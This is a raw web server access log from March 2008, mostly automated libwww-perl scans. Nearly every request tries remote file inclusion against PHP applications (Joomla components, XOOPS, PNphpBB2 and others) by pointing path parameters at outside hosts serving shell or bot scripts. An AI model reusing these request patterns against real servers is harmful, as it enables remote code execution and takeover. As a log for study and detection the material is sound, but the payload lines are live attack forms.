76.88.24.0 - - [23/Mar/2008:19:25:44 -0700] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://erusrox.t35.com/ids/goodid.txt?? HTTP/1.1" 404 266 "-" "libwww-perl/5.805"
76.88.24.0 - - [23/Mar/2008:19:25:45 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://erusrox.t35.com/ids/goodid.txt?? HTTP/1.1" 404 271 "-" "libwww-perl/5.805"
87.230.15.10 - - [23/Mar/2008:19:26:06 -0700] "GET /logs/error_log.20080224//skin/zero_vote/error.php?dir=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 255 "-" "libwww-perl/5.803"
76.88.24.0 - - [23/Mar/2008:19:26:30 -0700] "GET /logs/error_log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://erusrox.t35.com/ids/goodid.txt?? HTTP/1.1" 404 281 "-" "libwww-perl/5.805"
72.30.216.103 - - [23/Mar/2008:19:26:38 -0700] "GET /logs/access_log HTTP/1.0" 200 75892 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.36.235.74 - - [23/Mar/2008:19:26:42 -0700] "GET /logs/access_log/index.php?option=com_uhp&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo2? HTTP/1.1" 404 231 "-" "libwww-perl/5.79"
72.36.235.74 - - [23/Mar/2008:19:26:43 -0700] "GET /logs/index.php?option=com_uhp&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo2? HTTP/1.1" 404 232 "-" "libwww-perl/5.79"
72.36.235.74 - - [23/Mar/2008:19:26:50 -0700] "GET /logs/error_log/index.php?option=com_uhp&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo2? HTTP/1.1" 404 230 "-" "libwww-perl/5.79"
83.19.144.26 - - [23/Mar/2008:19:26:53 -0700] "GET /logs/error_log.20080127/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.tovr.com/images/id.gif? HTTP/1.1" 404 257 "-" "libwww-perl/5.76"
83.19.144.26 - - [23/Mar/2008:19:26:54 -0700] "GET /xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.tovr.com/images/id.gif? HTTP/1.1" 404 233 "-" "libwww-perl/5.76"
83.19.144.26 - - [23/Mar/2008:19:26:54 -0700] "GET /logs/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.tovr.com/images/id.gif? HTTP/1.1" 404 238 "-" "libwww-perl/5.76"
66.162.134.138 - - [23/Mar/2008:19:27:19 -0700] "GET /logs/access_log.20080203/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 274 "-" "libwww-perl/5.808"
58.65.239.170 - - [23/Mar/2008:19:28:04 -0700] "GET /logs/access_log.20080210 HTTP/1.1" 200 917504 "-" "-"
66.7.207.104 - - [23/Mar/2008:19:28:19 -0700] "GET /logs/access_log.20080210//?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 232 "-" "libwww-perl/5.808"
66.7.207.104 - - [23/Mar/2008:19:28:19 -0700] "GET /logs//?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 200 6086 "-" "libwww-perl/5.808"
83.19.144.26 - - [23/Mar/2008:19:28:45 -0700] "GET /logs/access_log.20080127/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.tovr.com/images/id.gif? HTTP/1.1" 404 258 "-" "libwww-perl/5.76"
67.28.112.57 - - [23/Mar/2008:19:30:14 -0700] "GET /logs/access_log.20080127/config.php?path_to_root=http://www.tovr.com/images/id.gif? HTTP/1.1" 404 241 "-" "libwww-perl/5.803"
67.28.112.57 - - [23/Mar/2008:19:30:14 -0700] "GET /config.php?path_to_root=http://www.tovr.com/images/id.gif? HTTP/1.1" 404 228 "-" "libwww-perl/5.803"
67.28.112.57 - - [23/Mar/2008:19:30:14 -0700] "GET /logs/config.php?path_to_root=http://www.tovr.com/images/id.gif? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
72.9.145.111 - - [23/Mar/2008:19:30:19 -0700] "GET /logs/error_log.20080210/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.lirik.biz//skins/bobbyzhuo/.debug/cmd.txt? HTTP/1.1" 404 274 "-" "libwww-perl/5.808"
210.188.214.241 - - [23/Mar/2008:19:31:16 -0700] "GET /logs/access_log/Scanner252http://www.paolodune.it/.ownz/safeon.dat???? HTTP/1.1" 404 272 "-" "libwww-perl/5.805"
210.188.214.241 - - [23/Mar/2008:19:31:16 -0700] "GET /Scanner252http://www.paolodune.it/.ownz/safeon.dat???? HTTP/1.1" 404 256 "-" "libwww-perl/5.805"
210.188.214.241 - - [23/Mar/2008:19:31:17 -0700] "GET /logs/Scanner252http://www.paolodune.it/.ownz/safeon.dat???? HTTP/1.1" 404 261 "-" "libwww-perl/5.805"
67.28.112.57 - - [23/Mar/2008:19:32:12 -0700] "GET /logs/access_log/config.php?path_to_root=http://www.tovr.com/images/id.gif? HTTP/1.1" 404 232 "-" "libwww-perl/5.803"
69.10.154.114 - - [23/Mar/2008:19:33:14 -0700] "GET /logs/access_log//header.php?css_path=http://gimpindustries.net/ca/images/arab.txt? HTTP/1.1" 404 233 "-" "libwww-perl/5.808"
69.10.154.114 - - [23/Mar/2008:19:33:14 -0700] "GET //header.php?css_path=http://gimpindustries.net/ca/images/arab.txt? HTTP/1.1" 404 229 "-" "libwww-perl/5.808"
69.10.154.114 - - [23/Mar/2008:19:33:15 -0700] "GET /logs//header.php?css_path=http://gimpindustries.net/ca/images/arab.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.808"
206.53.51.240 - - [23/Mar/2008:19:33:25 -0700] "GET /logs/access_log//header.php?css_path=http://gimpindustries.net/ca/images/arab.txt? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
206.53.51.240 - - [23/Mar/2008:19:33:25 -0700] "GET //header.php?css_path=http://gimpindustries.net/ca/images/arab.txt? HTTP/1.1" 404 229 "-" "libwww-perl/5.805"
206.53.51.240 - - [23/Mar/2008:19:33:25 -0700] "GET /logs//header.php?css_path=http://gimpindustries.net/ca/images/arab.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
208.186.169.183 - - [23/Mar/2008:19:33:45 -0700] "GET /sbeesley@shaw.ca,http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 260 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
208.186.169.183 - - [23/Mar/2008:19:33:45 -0700] "GET /logs/sbeesley@shaw.ca,http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 265 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
81.2.252.15 - - [23/Mar/2008:19:34:00 -0700] "GET /logs//ashnews.php?pathtoashnews=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
81.2.252.15 - - [23/Mar/2008:19:34:00 -0700] "GET /logs//ashnews.php?pathtoashnews=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
81.2.252.15 - - [23/Mar/2008:19:34:01 -0700] "GET //ashnews.php?pathtoashnews=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 230 "-" "libwww-perl/5.805"
81.2.252.15 - - [23/Mar/2008:19:34:01 -0700] "GET //ashnews.php?pathtoashnews=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 230 "-" "libwww-perl/5.805"
61.250.95.201 - - [23/Mar/2008:19:34:22 -0700] "GET /logs/access_log.20080203/admincp/auth/checklogin.php?cfgProgDir=http://heidik.org/canar/safe.txt? HTTP/1.1" 404 258 "-" "libwww-perl/5.79"
67.195.44.110 - - [23/Mar/2008:19:34:30 -0700] "GET /robots.txt HTTP/1.0" 404 204 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
69.13.230.217 - - [23/Mar/2008:19:34:32 -0700] "GET /index.php?p=%22http://gustavosagaz.t35.com/test.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
69.13.230.217 - - [23/Mar/2008:19:34:32 -0700] "GET /logs/index.php?p=%22http://gustavosagaz.t35.com/test.txt??? HTTP/1.1" 404 232 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)"
67.195.44.84 - - [23/Mar/2008:19:34:33 -0700] "GET /logs/access_log.2008020316 HTTP/1.0" 200 217825 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.29.71.91 - - [23/Mar/2008:19:35:06 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://netbr.org/documents/cmd.txt? HTTP/1.1" 404 247 "-" "libwww-perl/5.808"
72.29.71.91 - - [23/Mar/2008:19:35:08 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://netbr.org/documents/cmd.txt? HTTP/1.1" 404 233 "-" "libwww-perl/5.808"
219.166.61.155 - - [23/Mar/2008:19:35:13 -0700] "GET /logs/access_log.20080203/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 274 "-" "libwww-perl/5.805"
203.22.204.188 - - [23/Mar/2008:19:36:51 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://bmcbeth.com/data/tmp/special.txt???? HTTP/1.1" 404 247 "-" "libwww-perl/5.808"
203.22.204.188 - - [23/Mar/2008:19:36:51 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://bmcbeth.com/data/tmp/special.txt???? HTTP/1.1" 404 242 "-" "libwww-perl/5.808"
85.214.56.123 - - [23/Mar/2008:19:36:55 -0700] "GET /logs/access_log.20080203/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 274 "-" "libwww-perl/5.803"
72.29.71.91 - - [23/Mar/2008:19:37:34 -0700] "GET /main.php?x=http://netbr.org/documents/cmd.txt? HTTP/1.1" 404 226 "-" "libwww-perl/5.808"
213.247.44.96 - - [23/Mar/2008:19:37:36 -0700] "GET /logs//skin/zero_vote/error.php?dir=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 236 "-" "libwww-perl/5.65"
213.247.44.96 - - [23/Mar/2008:19:37:36 -0700] "GET //skin/zero_vote/error.php?dir=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 231 "-" "libwww-perl/5.65"
205.234.200.223 - - [23/Mar/2008:19:38:34 -0700] "GET /main.php?x=http://br.geocities.com/botnet2006/include.c?? HTTP/1.1" 404 226 "-" "libwww-perl/5.808"
69.66.77.224 - - [23/Mar/2008:19:38:59 -0700] "GET /logs/access_log.20080120//administrator/index.php?mosConfig_absolute_path=http://www.paolodune.it/.ownz/safeon.dat???? HTTP/1.1" 404 255 "-" "libwww-perl/5.79"
69.66.77.224 - - [23/Mar/2008:19:38:59 -0700] "GET //administrator/index.php?mosConfig_absolute_path=http://www.paolodune.it/.ownz/safeon.dat???? HTTP/1.1" 404 230 "-" "libwww-perl/5.79"
69.66.77.224 - - [23/Mar/2008:19:38:59 -0700] "GET /logs//administrator/index.php?mosConfig_absolute_path=http://www.paolodune.it/.ownz/safeon.dat???? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
66.7.207.104 - - [23/Mar/2008:19:39:11 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 255 "-" "libwww-perl/5.808"
210.188.214.241 - - [23/Mar/2008:19:39:34 -0700] "GET /Scanner252http://www.paolodune.it/.ownz/safeon.dat???? HTTP/1.1" 404 256 "-" "libwww-perl/5.805"
72.9.145.111 - - [23/Mar/2008:19:39:44 -0700] "GET /logs/error_log.20080127/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.lirik.biz//skins/bobbyzhuo/.debug/cmd.txt? HTTP/1.1" 404 274 "-" "libwww-perl/5.808"
74.50.105.133 - - [23/Mar/2008:19:40:15 -0700] "GET /logs/access_log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://darkness.ws/xpl/bot/ids.txt? HTTP/1.1" 404 281 "-" "libwww-perl/5.808"
74.50.105.133 - - [23/Mar/2008:19:40:15 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://darkness.ws/xpl/bot/ids.txt? HTTP/1.1" 404 265 "-" "libwww-perl/5.808"
74.50.105.133 - - [23/Mar/2008:19:40:15 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://darkness.ws/xpl/bot/ids.txt? HTTP/1.1" 404 270 "-" "libwww-perl/5.808"
72.9.145.111 - - [23/Mar/2008:19:40:18 -0700] "GET /logs/access_log.20080127//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.lirik.biz//skins/bobbyzhuo/.debug/cmd.txt? HTTP/1.1" 404 278 "-" "libwww-perl/5.808"
72.9.145.111 - - [23/Mar/2008:19:40:18 -0700] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.lirik.biz//skins/bobbyzhuo/.debug/cmd.txt? HTTP/1.1" 404 253 "-" "libwww-perl/5.808"
72.9.145.111 - - [23/Mar/2008:19:40:19 -0700] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.lirik.biz//skins/bobbyzhuo/.debug/cmd.txt? HTTP/1.1" 404 258 "-" "libwww-perl/5.808"
72.46.128.50 - - [23/Mar/2008:19:40:31 -0700] "GET /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.isogo.co.za/sendstudio/archive/8/help.txt? HTTP/1.1" 404 261 "-" "libwww-perl/5.808"
204.9.78.190 - - [23/Mar/2008:19:40:37 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.col.fr/img/xpll.txt? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
74.200.201.194 - - [23/Mar/2008:19:40:41 -0700] "GET /logs/error_log.20080224/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.isogo.co.za/sendstudio/archive/8/help.txt? HTTP/1.1" 404 285 "-" "libwww-perl/5.808"
74.200.201.194 - - [23/Mar/2008:19:40:41 -0700] "GET /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.isogo.co.za/sendstudio/archive/8/help.txt? HTTP/1.1" 404 261 "-" "libwww-perl/5.808"
74.200.201.194 - - [23/Mar/2008:19:40:41 -0700] "GET /logs/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.isogo.co.za/sendstudio/archive/8/help.txt? HTTP/1.1" 404 266 "-" "libwww-perl/5.808"
74.50.105.133 - - [23/Mar/2008:19:40:45 -0700] "GET /logs/access_log.20080127//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://darkness.ws/xpl/bot/ids.txt? HTTP/1.1" 404 270 "-" "libwww-perl/5.808"
74.50.105.133 - - [23/Mar/2008:19:40:45 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://darkness.ws/xpl/bot/ids.txt? HTTP/1.1" 404 245 "-" "libwww-perl/5.808"
74.50.105.133 - - [23/Mar/2008:19:40:45 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://darkness.ws/xpl/bot/ids.txt? HTTP/1.1" 404 250 "-" "libwww-perl/5.808"
74.50.105.133 - - [23/Mar/2008:19:41:38 -0700] "GET /logs/error_log.20080217/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://darkness.ws/xpl/bot/ids.txt? HTTP/1.1" 404 289 "-" "libwww-perl/5.808"
72.46.128.50 - - [23/Mar/2008:19:41:42 -0700] "GET /logs/error_log.20080224/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.isogo.co.za/sendstudio/archive/8/help.txt? HTTP/1.1" 404 285 "-" "libwww-perl/5.808"
72.46.128.50 - - [23/Mar/2008:19:41:42 -0700] "GET /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.isogo.co.za/sendstudio/archive/8/help.txt? HTTP/1.1" 404 261 "-" "libwww-perl/5.808"
72.46.128.50 - - [23/Mar/2008:19:41:42 -0700] "GET /logs/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.isogo.co.za/sendstudio/archive/8/help.txt? HTTP/1.1" 404 266 "-" "libwww-perl/5.808"
72.29.70.163 - - [23/Mar/2008:19:41:56 -0700] "GET /logs/error_log.20080210//mvcw_conver.php?step=http://www.liautism.com/media/arab.txt? HTTP/1.1" 404 246 "-" "libwww-perl/5.808"
72.29.70.163 - - [23/Mar/2008:19:41:56 -0700] "GET //mvcw_conver.php?step=http://www.liautism.com/media/arab.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.808"
72.29.70.163 - - [23/Mar/2008:19:41:56 -0700] "GET /logs//mvcw_conver.php?step=http://www.liautism.com/media/arab.txt? HTTP/1.1" 404 239 "-" "libwww-perl/5.808"
74.200.201.194 - - [23/Mar/2008:19:42:01 -0700] "GET /logs/access_log.20080210/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.isogo.co.za/sendstudio/archive/8/help.txt? HTTP/1.1" 404 286 "-" "libwww-perl/5.808"
208.186.169.183 - - [23/Mar/2008:19:42:02 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 255 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
208.186.169.183 - - [23/Mar/2008:19:42:03 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 260 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
72.46.128.50 - - [23/Mar/2008:19:43:16 -0700] "GET /logs/access_log.20080210/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.isogo.co.za/sendstudio/archive/8/help.txt? HTTP/1.1" 404 286 "-" "libwww-perl/5.808"
66.7.207.104 - - [23/Mar/2008:19:44:03 -0700] "GET /logs/access_log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 271 "-" "libwww-perl/5.808"
66.7.207.104 - - [23/Mar/2008:19:44:04 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.808"
69.61.37.111 - - [23/Mar/2008:19:44:12 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.col.fr/img/xpll.txt? HTTP/1.1" 404 255 "-" "libwww-perl/5.808"
160.99.12.231 - - [23/Mar/2008:19:44:28 -0700] "GET /logs/access_log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.cyberzane.net/data/id.txt? HTTP/1.1" 404 271 "-" "libwww-perl/5.65"
160.99.12.231 - - [23/Mar/2008:19:44:29 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.cyberzane.net/data/id.txt? HTTP/1.1" 404 255 "-" "libwww-perl/5.65"
160.99.12.231 - - [23/Mar/2008:19:44:29 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.cyberzane.net/data/id.txt? HTTP/1.1" 404 260 "-" "libwww-perl/5.65"
204.9.78.190 - - [23/Mar/2008:19:44:35 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.col.fr/img/xpll.txt? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
202.12.29.5 - - [23/Mar/2008:19:44:45 -0700] "GET /logs/error_log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://CMD/r7?? HTTP/1.1" 404 280 "-" "libwww-perl/5.805"
202.12.29.5 - - [23/Mar/2008:19:44:46 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://CMD/r7?? HTTP/1.1" 404 270 "-" "libwww-perl/5.805"
202.12.29.5 - - [23/Mar/2008:19:44:48 -0700] "GET /logs/access_log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://CMD/r7?? HTTP/1.1" 404 281 "-" "libwww-perl/5.805"
205.234.200.223 - - [23/Mar/2008:19:44:49 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://br.geocities.com/botnet2006/include.c?? HTTP/1.1" 404 233 "-" "libwww-perl/5.808"
210.188.214.241 - - [23/Mar/2008:19:44:58 -0700] "GET /logs/Scanner252http://www.paolodune.it/.ownz/safeon.dat???? HTTP/1.1" 404 261 "-" "libwww-perl/5.805"
210.188.214.241 - - [23/Mar/2008:19:44:59 -0700] "GET /Scanner252http://www.paolodune.it/.ownz/safeon.dat???? HTTP/1.1" 404 256 "-" "libwww-perl/5.805"
72.36.213.36 - - [23/Mar/2008:19:45:25 -0700] "GET //templates/headline_temp.php?nst_inc=http://www.geocities.com/cakep_abis/cmd.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.808"
85.21.163.20 - - [23/Mar/2008:19:45:56 -0700] "GET //templates/headline_temp.php?nst_inc=http://www.geocities.com/cakep_abis/cmd.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
72.10.47.53 - - [23/Mar/2008:19:46:06 -0700] "GET /logs//skin/zero_vote/error.php?dir=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 236 "-" "libwww-perl/5.65"
72.10.47.53 - - [23/Mar/2008:19:46:06 -0700] "GET //skin/zero_vote/error.php?dir=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 231 "-" "libwww-perl/5.65"
72.29.70.163 - - [23/Mar/2008:19:46:49 -0700] "GET /logs/access_log.20080113//mvcw_conver.php?step=http://www.liautism.com/media/arab.txt? HTTP/1.1" 404 247 "-" "libwww-perl/5.808"
58.65.239.170 - - [23/Mar/2008:19:47:19 -0700] "GET /logs/access_log.20080210 HTTP/1.1" 200 557056 "-" "-"
206.53.51.240 - - [23/Mar/2008:19:48:53 -0700] "GET /logs//mvcw_conver.php?step=http://gimpindustries.net/ca/images/arab.txt? HTTP/1.1" 404 239 "-" "libwww-perl/5.805"
69.61.37.111 - - [23/Mar/2008:19:49:23 -0700] "GET /logs/access_log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.col.fr/img/xpll.txt? HTTP/1.1" 404 271 "-" "libwww-perl/5.808"
69.61.37.111 - - [23/Mar/2008:19:49:23 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.col.fr/img/xpll.txt? HTTP/1.1" 404 260 "-" "libwww-perl/5.808"
69.61.37.111 - - [23/Mar/2008:19:49:35 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.col.fr/img/xpll.txt? HTTP/1.1" 404 255 "-" "libwww-perl/5.808"
69.10.154.114 - - [23/Mar/2008:19:50:42 -0700] "GET /logs/error_log.20080210//mvcw_conver.php?step=http://gimpindustries.net/ca/images/arab.txt? HTTP/1.1" 404 246 "-" "libwww-perl/5.808"
69.10.154.114 - - [23/Mar/2008:19:50:42 -0700] "GET //mvcw_conver.php?step=http://gimpindustries.net/ca/images/arab.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.808"
69.10.154.114 - - [23/Mar/2008:19:50:43 -0700] "GET /logs//mvcw_conver.php?step=http://gimpindustries.net/ca/images/arab.txt? HTTP/1.1" 404 239 "-" "libwww-perl/5.808"
64.151.245.1 - - [23/Mar/2008:19:51:41 -0700] "GET /logs/access_log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 248 "-" "libwww-perl/5.805"
64.151.245.1 - - [23/Mar/2008:19:51:42 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
64.151.245.1 - - [23/Mar/2008:19:51:42 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 237 "-" "libwww-perl/5.805"
64.151.245.1 - - [23/Mar/2008:19:51:47 -0700] "GET /logs/access_log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 248 "-" "libwww-perl/5.805"
64.151.245.1 - - [23/Mar/2008:19:51:47 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
64.151.245.1 - - [23/Mar/2008:19:51:47 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 237 "-" "libwww-perl/5.805"
72.36.213.36 - - [23/Mar/2008:19:52:23 -0700] "GET /logs/error_log//templates/headline_temp.php?nst_inc=http://www.geocities.com/cakep_abis/cmd.txt? HTTP/1.1" 404 249 "-" "libwww-perl/5.808"
72.36.213.36 - - [23/Mar/2008:19:52:23 -0700] "GET /logs//templates/headline_temp.php?nst_inc=http://www.geocities.com/cakep_abis/cmd.txt? HTTP/1.1" 404 239 "-" "libwww-perl/5.808"
69.61.37.111 - - [23/Mar/2008:19:52:26 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.col.fr/img/xpll.txt? HTTP/1.1" 404 255 "-" "libwww-perl/5.808"
64.151.245.1 - - [23/Mar/2008:19:53:37 -0700] "GET /logs/error_log.20080224//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 256 "-" "libwww-perl/5.805"
64.151.245.1 - - [23/Mar/2008:19:53:38 -0700] "GET /logs/error_log.20080224//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 256 "-" "libwww-perl/5.805"
206.53.51.240 - - [23/Mar/2008:19:54:46 -0700] "GET /logs/access_log.20080113//mvcw_conver.php?step=http://gimpindustries.net/ca/images/arab.txt? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
87.106.9.138 - - [23/Mar/2008:19:55:07 -0700] "GET /logs/access_log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 248 "-" "libwww-perl/5.803"
87.106.9.138 - - [23/Mar/2008:19:55:08 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 232 "-" "libwww-perl/5.803"
87.106.9.138 - - [23/Mar/2008:19:55:08 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 237 "-" "libwww-perl/5.803"
69.10.154.114 - - [23/Mar/2008:19:55:15 -0700] "GET /logs/access_log//header.php?css_path=http://www.neverfallenclan.com/id.txt? HTTP/1.1" 404 233 "-" "libwww-perl/5.808"
69.10.154.114 - - [23/Mar/2008:19:55:15 -0700] "GET //header.php?css_path=http://www.neverfallenclan.com/id.txt? HTTP/1.1" 404 229 "-" "libwww-perl/5.808"
69.10.154.114 - - [23/Mar/2008:19:55:15 -0700] "GET /logs//header.php?css_path=http://www.neverfallenclan.com/id.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.808"
74.50.105.133 - - [23/Mar/2008:19:55:28 -0700] "GET /logs/access_log/modules/My_eGallery/index.php?basepath=http://darkness.ws/xpl/bot/ids.txt? HTTP/1.1" 404 251 "-" "libwww-perl/5.808"
74.50.105.133 - - [23/Mar/2008:19:55:28 -0700] "GET /modules/My_eGallery/index.php?basepath=http://darkness.ws/xpl/bot/ids.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.808"
